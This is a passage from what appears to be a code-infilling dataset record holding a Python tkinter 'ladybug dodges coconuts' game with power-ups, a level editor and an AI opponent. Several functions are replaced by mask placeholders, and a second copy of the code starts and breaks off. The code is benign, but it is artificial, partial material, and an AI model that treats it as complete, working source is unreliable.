data.player1Y += data.hitPenalty\n data.coconuts1.remove(coconut)\n if data.Invincible2 == False:\n for coconut in data.coconuts2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= \n data.player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <=\n data.player2X + data.r):\n data.player2Y += data.hitPenalty\n data.coconuts2.remove(coconut)\n\n\nclass PowerUps(Coconuts):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.hourGlass)\n\n\ndef hitPause(data):\n for powerUp in data.powerUps:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.pauseDrops = True\n data.start = data.cy\n data.powerUps.remove(powerUp)\n elif data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.pause1Drop = True\n data.start1 = data.player1Y\n data.powerUps.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.pause2Drop = True\n data.start2 = data.player2Y\n data.powerUps.remove(powerUp)\n\n\nclass Invincible(PowerUps):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.umbrella)\n\n\ndef hitInvincible(data):\n for powerUp in data.invincible:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.beInvincible = True\n data.start = data.cy\n 
data.invincible.remove(powerUp)\n if data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.Invincible1 = True\n data.start1 = data.player1Y\n data.invincible.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.Invincible2 = True\n data.start2 = data.player2Y\n data.invincible.remove(powerUp)\n\n\nclass ScaryBug(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.speed = 25\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.spider)\n\n def onTimerFired(self, data):\n if data.mode == '2Player' or data.mode == 'AI':\n self.speed = 35\n self.y -= self.speed\n if (data.mode == '1Player' or data.mode == 'levelCreated' and data.\n time % 8 == 0):\n side = random.choice(data.sides)\n if side == 'l':\n if self.x - data.lane >= data.Player1Min:\n self.x -= data.lane\n else:\n self.x += data.lane\n elif side == 'r':\n if self.x + data.lane <= data.Player1Max:\n self.x += data.lane\n else:\n self.x -= data.lane\n\n\ndef hitScaryBug(data):\n for bug in data.scaryBug:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if (bug.y >= data.cy - 1.5 * data.r and bug.y <= data.cy + 1.5 *\n data.r):\n if (bug.x >= data.cx - 1.5 * data.r and bug.x <= data.cx + \n 1.5 * data.r):\n data.hit = True\n data.lives = 0\n data.levelEditorLives = 0\n if data.mode == '2Player' or data.mode == 'AI':\n if (bug.y >= data.player1Y - data.r and bug.y <= data.player1Y +\n data.r):\n if (bug.x >= data.player1X - data.r and bug.x <= data.\n player1X + data.r):\n data.winner = 'player2'\n if (bug.y >= data.player2Y - data.r and bug.y <= data.player2Y +\n data.r):\n if (bug.x >= data.player2X - data.r and bug.x <= data.\n player2X + 
data.r):\n data.winner = 'player1'\n\n\ndef drawPowerups(canvas, data):\n for bug in data.scaryBug:\n bug.draw(canvas, data)\n for powerUp in data.powerUps:\n powerUp.draw(canvas, data)\n for powerUp in data.invincible:\n powerUp.draw(canvas, data)\n\n\ndef drawHome(canvas, data):\n canvas.create_image(data.homeX, data.homeY, image=data.home)\n\n\n<mask token>\n\n\ndef powerUpCoconutShot(data):\n if data.time % 60 == 0 and data.time % 120 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 50 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 100 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef playerRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 50, text='Level: %d' % data.level,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(data.width / 6, 80, text='Score: %d' % data.score,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(2 * data.width / 3, 660, text=\n \"\"\"The greater the level, the more points get\n added to your score!\"\"\"\n , font='Arial 15 bold', fill='yellow')\n if data.hit == True:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! 
Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n canvas.create_text(data.width / 2, 280, text='Score: %d' % data.\n score, font='Arial 13 bold', fill='yellow')\n if data.level >= 8:\n madeIt(canvas, data)\n drawHome(canvas, data)\n\n\ndef madeIt(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 70, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score,\n font='Arial 15 bold', fill='yellow')\n canvas.create_text(data.width / 2, 375, text=\n 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow')\n canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, \n 450, fill='white')\n canvas.create_text(data.width / 2, 425, text=data.name)\n\n\ndef drop2Player(data):\n if data.winner == None and data.pauseDrops == False:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25:\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 12 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(140, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(344, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(755, 0))\n powerupDrop2Player(data)\n\n\ndef powerupDrop2Player(data):\n if data.time % 45 == 0 and data.time % 90 != 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(140, 0))\n if data.pause2Drop != True:\n 
data.powerUps.append(PowerUps(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(344, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(755, 0))\n if data.time % 60 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 90 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(540, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(755, 750))\n\n\ndef twoPlayerKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n if data.winner == None:\n if event.keysym == 'a' and data.onLeft1 == False:\n data.onLeft1 = True\n data.player1X = 150\n if event.keysym == 'd' and data.onLeft1 == True:\n data.onLeft1 = False\n data.player1X = 330\n if event.keysym == 'Left' and data.onLeft2 == False:\n data.onLeft2 = True\n data.player2X = 550\n if event.keysym == 'Right' and data.onLeft2 == True:\n data.onLeft2 = False\n data.player2X = 750\n\n\ndef twoPlayerMousePressed(event, data):\n checkHome(event, data)\n\n\ndef twoPlayerTimerFired(data):\n if data.winner == None:\n data.player1Y -= data.speed\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n drop2Player(data)\n data.player2Y -= data.speed\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n drop2Player(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in 
data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n powerupTimerFired(data)\n\n\ndef powerupTimerFired(data):\n for coconut in data.coconuts1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n hit2Player(data)\n for coconut in data.coconuts2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\ndef twoPlayerRedrawAll(canvas, data):\n canvas.create_image(data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_image(3 * data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10\n )\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts1:\n coconut.draw(canvas)\n for coconut in data.coconuts2:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\n canvas.create_text(50, 40, text='Player 1', font='Arial 15 bold', fill=\n 'yellow')\n canvas.create_text(450, 40, text='Player 2', font='Arial 15 bold', fill\n ='yellow')\n winner(canvas, data)\n drawHome(canvas, data)\n\n\ndef winner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! 
Player 1', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 2', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef editorKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef editorMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.yourSpeed = 'slow'\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.yourSpeed = 'medium'\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.yourSpeed = 'fast'\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n checkMiddle(event, data)\n checkLast(event, data)\n\n\ndef checkMiddle(event, data):\n if data.medX - data.r <= event.y <= data.medX + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.rainSpeed = 'drizzle'\n data.drizzle = data.click\n data.rain, data.thunderstorm = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.rainSpeed = 'rain'\n data.rain = data.click\n data.drizzle, data.thunderstorm = data.notClick, data.notClick\n if data.hardX 
- 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.rainSpeed = 'thunderstorm'\n data.thunderstorm = data.click\n data.drizzle, data.rain = data.notClick, data.notClick\n\n\n<mask token>\n\n\ndef drawButtons(canvas, data):\n data.font, data.fill = 'Helvetica 13 bold', 'yellow'\n canvas.create_text(data.medX, data.YST, text='Your Speed:', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyX, data.easyY, image=data.slow)\n canvas.create_text(data.easyX, data.easyY, text='Slow', font=data.font)\n canvas.create_image(data.medX, data.easyY, image=data.medium)\n canvas.create_text(data.medX, data.easyY, text='Medium', font=data.font)\n canvas.create_image(data.hardX, data.easyY, image=data.fast)\n canvas.create_text(data.hardX, data.easyY, text='Fast', font=data.font)\n canvas.create_image(data.easyX, data.medX, image=data.drizzle)\n canvas.create_text(data.medX, data.RST, text='Rain Speed:', font=data.\n font, fill=data.fill)\n canvas.create_text(data.easyX, data.medX, text='Drizzle', font=data.font)\n canvas.create_image(data.medX, data.medX, image=data.rain)\n canvas.create_text(data.medX, data.medX, text='Rain', font=data.font)\n canvas.create_image(data.hardX, data.medX, image=data.thunderstorm)\n canvas.create_text(data.hardX, data.medX, text='Heavy', font=data.font)\n canvas.create_text(data.medX, data.PUT, text='PowerUps?', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyY, data.last, image=data.yes)\n canvas.create_text(data.easyY, data.last, text='Yes', font=data.font)\n canvas.create_image(data.last, data.last, image=data.no)\n canvas.create_text(data.last, data.last, text='No', font=data.font)\n changeEnter(canvas, data)\n\n\ndef changeEnter(canvas, data):\n if (data.powerUpsEditor != None and data.yourSpeed != None and data.\n rainSpeed != None):\n data.enter = data.click\n canvas.create_image(data.medX, data.enterX, image=data.enter)\n canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font)\n\n\ndef 
editorTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef editorRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.S_P - 10, text=\n 'Edit Your Level!', font='Arial 23 bold', fill='yellow')\n drawButtons(canvas, data)\n drawHome(canvas, data)\n\n\ndef setEverything(data):\n if data.yourSpeed == 'slow':\n data.speed = 6\n elif data.yourSpeed == 'medium':\n data.speed = 10\n elif data.yourSpeed == 'fast':\n data.speed = 14\n if data.rainSpeed == 'thunderstorm':\n data.rSpeed = 7\n elif data.rainSpeed == 'rain':\n data.rSpeed = 10\n elif data.rainSpeed == 'drizzle':\n data.rSpeed = 13\n\n\n<mask token>\n\n\ndef levelPowerUp(data):\n if data.powerUpsEditor == True:\n if data.time % 20 == 0 and data.time % 40 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 30 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 35 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef levelCreatedMousePressed(event, data):\n checkHome(event, data)\n\n\ndef levelCreatedTimerFired(data):\n setEverything(data)\n if data.levelEditorLives > 0:\n data.cy -= data.speed\n if data.cy < 15:\n data.level += 1\n if data.cy > 40:\n data.time += 1\n if data.pauseDrops != True:\n levelCoconutShot(data)\n if data.powerUpsEditor == False:\n for coconut in data.coconuts:\n coconut.onTimerFired(data)\n hit(data)\n if data.powerUpsEditor == True:\n for powerUp in data.powerUps:\n 
powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n for coconut in data.coconuts:\n if data.pauseDrops == False:\n coconut.onTimerFired(data)\n if data.beInvincible == False:\n hit(data)\n if data.start != None:\n if abs(data.start - data.cy) >= 120:\n data.pauseDrops, data.beInvincible = False, False\n\n\ndef levelCreatedRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n if data.powerUpsEditor == True:\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 100, text='Total Lives: %d' % data.\n levelEditorLives, font='Arial 20 bold', fill='yellow')\n canvas.create_text(data.width / 2, 660, text=\n \"\"\"You lose a life for hitting a drop\n & don't get eaten!\"\"\",\n font='Arial 15 bold', fill='yellow')\n if data.levelEditorLives <= 0:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! 
Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n if data.level > 1:\n winEditor(canvas, data)\n drawHome(canvas, data)\n\n\ndef winEditor(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n\n\n<mask token>\n\n\ndef difficultyMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.difficulty = data.difS\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.difficulty = data.difM\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.difficulty = data.difH\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n if data.enter == data.click:\n if data.enterY - data.r <= event.y <= data.enterY + data.r:\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.mode = 'AI'\n\n\ndef difficultyTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef difficultyRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawDifficulties(canvas, data)\n drawHome(canvas, data)\n\n\ndef hitAI1(data, distance):\n for coconut in data.coconutsAI1:\n if 
(data.player1Y - data.r - coconut.y <= distance and data.\n switchOnProgress == False):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r or AISwitchBug(data, distance) == True):\n testInt = random.randint(0, 9)\n if testInt <= data.difficulty:\n data.switchOnProgress = True\n if data.player1X == 150:\n data.player1X = 340\n else:\n data.player1X = 150\n data.switchOnProgress = False\n if (coconut.y >= data.player1Y - data.r and coconut.y <= data.\n player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r):\n data.player1Y += 50\n data.coconutsAI1.remove(coconut)\n\n\ndef AISwitchBug(data, distance):\n for scaryBug in data.scaryBug:\n if (data.player1Y - data.r - scaryBug.y <= distance and data.\n switchOnProgress == False):\n if (scaryBug.x >= data.player1X - data.r and scaryBug.x <= data\n .player1X + data.r):\n return True\n\n\ndef hitAI2(data, distance):\n for coconut in data.coconutsAI2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= data.\n player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <= data.\n player2X + data.r):\n data.player2Y += 50\n data.coconutsAI2.remove(coconut)\n\n\ndef coconutShotAI(data):\n if data.winner == None:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40:\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 8 == 0:\n xPosition2 = random.randint(0, 80)\n xPosition3 = random.randint(364, 385)\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition2, 0))\n data.coconutsAI1.append(Coconuts(xPosition3, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0))\n data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0))\n addExtraCoconut(data)\n 
addPowerUpsAI(data)\n\n\n<mask token>\n\n\ndef addPowerUpsAI(data):\n if data.time % 33 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(550, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 66 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(550, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(750, 750))\n\n\n<mask token>\n\n\ndef AITimerFired(data):\n if data.winner == None:\n if data.Invincible1 == False:\n hitAI1(data, 31)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 31)\n for coconut in data.coconutsAI1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n for coconut in data.coconutsAI2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.Invincible1 == False:\n hitAI1(data, 13)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 13)\n data.player1Y -= data.speedAI\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n coconutShotAI(data)\n data.player2Y -= data.speedAI\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n coconutShotAI(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n powerUpAITimerFired(data)\n\n\ndef powerUpAITimerFired(data):\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n if 
data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\ndef AIRedrawAll(canvas, data):\n canvas.create_image(data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_image(3 * data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10\n )\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconutsAI1:\n coconut.draw(canvas)\n for coconut in data.coconutsAI2:\n coconut.draw(canvas)\n canvas.create_text(50, 40, text='Computer', font='Arial 15 bold', fill=\n 'yellow')\n canvas.create_text(450, 40, text='Player 1', font='Arial 15 bold', fill\n ='yellow')\n drawPowerups(canvas, data)\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\n AIWinner(canvas, data)\n drawHome(canvas, data)\n\n\ndef AIWinner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='The Computer Won :(',\n font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! 
You Won!', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef scoreboardKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef scoreboardMousePressed(event, data):\n checkHome(event, data)\n\n\ndef scoreboardTimerFired(data):\n difficultyTimerFired(data)\n\n\ndef scoreboardRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.tbgY, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!',\n font='Arial 30 bold', fill='yellow')\n canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font=\n 'Arial 20 bold', fill='yellow')\n drawHome(canvas, data)\n data.savedScores\n data.savedScores = readFile('score.txt')\n score = data.savedScores.splitlines()\n scores = []\n for line in score:\n scores.append(line.split(','))\n scores = sorted(scores, key=lambda x: int(x[0]))\n top5 = scores[-data.numScores:]\n top5.reverse()\n for i in range(len(top5)):\n canvas.create_text(data.width / 2, data.scoreShift + i * 50, text=\n top5[i], font='Arial 18 bold', fill='yellow')\n\n\ndef helpKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\n<mask token>\n\n\ndef helpRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawHome(canvas, data)\n\n\ndef run(width=15000, height=25000):\n\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n redrawAll(canvas, data)\n canvas.update()\n\n def mousePressedWrapper(event, canvas, data):\n 
mousePressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas, data):\n keyPressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def timerFiredWrapper(canvas, data):\n timerFired(data)\n redrawAllWrapper(canvas, data)\n canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\n\n\n class Struct(object):\n pass\n data = Struct()\n data.width = width\n data.height = height\n data.timerDelay = 100\n root = Tk()\n init(data)\n canvas = Canvas(root, width=data.width, height=data.height)\n canvas.pack()\n root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas,\n data))\n root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data))\n timerFiredWrapper(canvas, data)\n root.mainloop()\n print('bye!')\n\n\n<mask token>\n", "step-4": "<mask token>\n\n\ndef init(data):\n data.score = 0\n data.mode = 'splashScreen'\n data.timerDelay = 100\n data.height = 800\n data.width = 800\n data.speed = 10\n data.speedAI = 12\n data.speedAI2 = 12\n data.switchOnProgress = False\n data.r = 25\n data.cx = 280\n data.cy = 750\n data.onLeft1, data.onLeft2 = True, True\n data.win = False\n data.coconuts = []\n data.powerUps = []\n data.coconuts1 = []\n data.coconuts2 = []\n data.coconutsAI1 = []\n data.coconutsAI2 = []\n data.invincible = []\n data.pauseDrops = False\n data.pause1Drop = False\n data.pause2Drop = False\n init1(data)\n\n\ndef init1(data):\n data.beInvincible = False\n data.Invincible1 = False\n data.Invincible2 = False\n data.scaryBug = []\n data.time = 0\n data.coconutFall = False\n data.sides = ['r', 'l']\n data.level = 1\n data.splashScreenTime = 0\n data.splashScreenDrops = []\n data.background = PhotoImage(file='tree.gif')\n data.deadScreen = PhotoImage(file='deadBug.gif')\n data.ladyBug = PhotoImage(file='lady.gif')\n data.winScreen = PhotoImage(file='treeTop1.gif')\n data.winBug = PhotoImage(file='littleBug.gif')\n data.halfBackground = PhotoImage(file='halfTree.gif')\n data.umbrella = 
